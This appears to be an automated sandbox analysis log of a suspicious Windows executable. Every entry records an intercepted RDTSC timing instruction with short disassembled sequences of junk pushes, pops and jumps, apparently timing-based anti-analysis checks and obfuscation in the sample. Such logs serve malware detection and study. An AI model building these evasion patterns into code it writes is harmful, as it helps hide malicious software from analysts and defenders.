Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D6F9DD second address: D6F9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F768C6F631Ch 0x0000000c popad 0x0000000d jl 00007F768C6F632Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D81FFD second address: D82015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F8114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D82015 second address: D82036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F768C6F6316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F768C6F631Dh 0x00000013 jc 00007F768C6F6316h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D90B86 second address: D90B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D978A2 second address: D978A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D97C6E second address: D97C76 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D9A205 second address: D9A224 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F768C6F631Ch 0x0000000c pop eax 0x0000000d jnl 00007F768C6F6342h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D9A095 second address: D9A09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D9B75E second address: D9B762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D9F409 second address: D9F411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D9F411 second address: D9F418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D9F418 second address: D9F435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F768C6F8110h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D9F0B5 second address: D9F0CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F768C6F631Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DA15A5 second address: DA15DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F768C6F8113h 0x0000000d pop eax 0x0000000e jg 00007F768C6F811Ah 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DAE59D second address: DAE5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F768C6F6320h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DAE5B6 second address: DAE5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DAE5BA second address: DAE5D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F768C6F631Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD17D4 second address: DD17DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD17DA second address: DD17E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD0630 second address: DD0647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F810Bh 0x00000007 jo 00007F768C6F810Eh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD0792 second address: DD079F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD079F second address: DD07A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD07A4 second address: DD07B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jno 00007F768C6F6316h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD0914 second address: DD0936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F8116h 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD0A8B second address: DD0A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F768C6F6316h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD0A9A second address: DD0AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD0F99 second address: DD0FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F768C6F6325h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD143E second address: DD145B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F768C6F810Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD412C second address: DD4150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 jmp 00007F768C6F6329h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD43DD second address: DD43EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F810Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD43EB second address: DD43F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F768C6F631Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD43F9 second address: DD4419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD4419 second address: DD441D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD441D second address: DD4423 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD4709 second address: DD473D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F768C6F6327h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007F768C6F631Fh 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD473D second address: DD4742 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD7699 second address: DD76C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F768C6F6326h 0x00000009 jmp 00007F768C6F6325h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD723C second address: DD7258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F768C6F8106h 0x0000000c jmp 00007F768C6F810Fh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD7258 second address: DD7279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Dh 0x00000007 js 00007F768C6F6326h 0x0000000d jmp 00007F768C6F631Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD9144 second address: DD9148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD9148 second address: DD9184 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F768C6F6316h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007F768C6F6316h 0x00000015 jmp 00007F768C6F631Bh 0x0000001a js 00007F768C6F6316h 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F768C6F631Eh 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD9184 second address: DD9190 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F768C6F8106h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD9190 second address: DD91A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F768C6F6316h 0x0000000a js 00007F768C6F6316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: DD91A0 second address: DD91A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF2BF8 second address: CF2BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53A035B second address: 53A03E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8112h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov al, dh 0x0000000d movzx ecx, di 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 push edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F768C6F810Dh 0x0000001c or esi, 6A2B32F6h 0x00000022 jmp 00007F768C6F8111h 0x00000027 popfd 0x00000028 popad 0x00000029 pushfd 0x0000002a jmp 00007F768C6F8110h 0x0000002f sbb ecx, 767BB418h 0x00000035 jmp 00007F768C6F810Bh 0x0000003a popfd 0x0000003b popad 0x0000003c mov ebp, esp 0x0000003e pushad 0x0000003f mov al, 99h 0x00000041 mov ecx, ebx 0x00000043 popad 0x00000044 mov edx, dword ptr [ebp+0Ch] 0x00000047 pushad 0x00000048 mov cx, di 0x0000004b mov esi, edi 0x0000004d popad 0x0000004e mov ecx, dword ptr [ebp+08h] 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 mov si, dx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0684 second address: 53C069A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C069A second address: 53C069E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C069E second address: 53C06A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C06A4 second address: 53C070D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F768C6F8118h 0x00000009 adc ah, FFFFFFF8h 0x0000000c jmp 00007F768C6F810Bh 0x00000011 popfd 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ecx 0x0000001e pushfd 0x0000001f jmp 00007F768C6F8113h 0x00000024 xor ah, 0000006Eh 0x00000027 jmp 00007F768C6F8119h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C070D second address: 53C0713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C07D1 second address: 53C07E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C07E6 second address: 53C0801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F6321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0801 second address: 53C080A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, E89Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C080A second address: 53C083C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F6322h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F768C6F6327h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C08AB second address: 53C08B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C08B0 second address: 53C08EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F768C6F631Dh 0x0000000a add cx, 4C76h 0x0000000f jmp 00007F768C6F6321h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 cmp dword ptr [ebp-04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F768C6F631Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C08EF second address: 53C08F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C08F5 second address: 53C0949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a pushad 0x0000000b call 00007F768C6F6325h 0x00000010 pushfd 0x00000011 jmp 00007F768C6F6320h 0x00000016 sub cl, 00000028h 0x00000019 jmp 00007F768C6F631Bh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 mov cx, dx 0x00000023 popad 0x00000024 je 00007F768C6F634Dh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push ecx 0x0000002e pop edi 0x0000002f mov di, cx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0949 second address: 53C094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C09A9 second address: 53C0A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F768C6F631Fh 0x00000009 or eax, 73D35D3Eh 0x0000000f jmp 00007F768C6F6329h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a leave 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F768C6F6328h 0x00000022 sub ax, 9168h 0x00000027 jmp 00007F768C6F631Bh 0x0000002c popfd 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53C0A11 second address: 53B0268 instructions: 0x00000000 rdtsc 0x00000002 mov si, 9E7Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007F768C6F826Ah 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F7690F844FFh 0x00000027 mov edi, edi 0x00000029 pushad 0x0000002a mov edx, eax 0x0000002c pushad 0x0000002d mov dh, ch 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0268 second address: 53B028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F768C6F631Eh 0x0000000c mov dword ptr [esp], ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 mov bx, AE8Eh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B028A second address: 53B030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F768C6F8110h 0x00000010 sub esp, 2Ch 0x00000013 pushad 0x00000014 pushad 0x00000015 mov bx, si 0x00000018 mov di, si 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F768C6F8114h 0x00000022 add si, BB68h 0x00000027 jmp 00007F768C6F810Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f jmp 00007F768C6F8116h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F768C6F810Eh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B030F second address: 53B0315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0315 second address: 53B0319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0319 second address: 53B031D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B04B4 second address: 53B04B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B04B8 second address: 53B04BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B04BE second address: 53B04C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B04C4 second address: 53B04C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B04C8 second address: 53B04CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0538 second address: 53B053C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B053C second address: 53B0542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0542 second address: 53B0551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F768C6F631Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0551 second address: 53B0585 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F768C6F81C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F768C6F810Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0585 second address: 53B0619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F768C6F6327h 0x00000009 jmp 00007F768C6F6323h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F768C6F6328h 0x00000015 adc ax, 6888h 0x0000001a jmp 00007F768C6F631Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 cmp dword ptr [ebp-14h], edi 0x00000026 jmp 00007F768C6F6326h 0x0000002b jne 00007F76FCF641B7h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F768C6F6327h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B0619 second address: 53B067A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F768C6F810Ch 0x00000013 xor esi, 244A9FA8h 0x00000019 jmp 00007F768C6F810Bh 0x0000001e popfd 0x0000001f mov di, ax 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-2Ch] 0x00000026 jmp 00007F768C6F8112h 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov ecx, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: 53B067A second address: 53B067F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
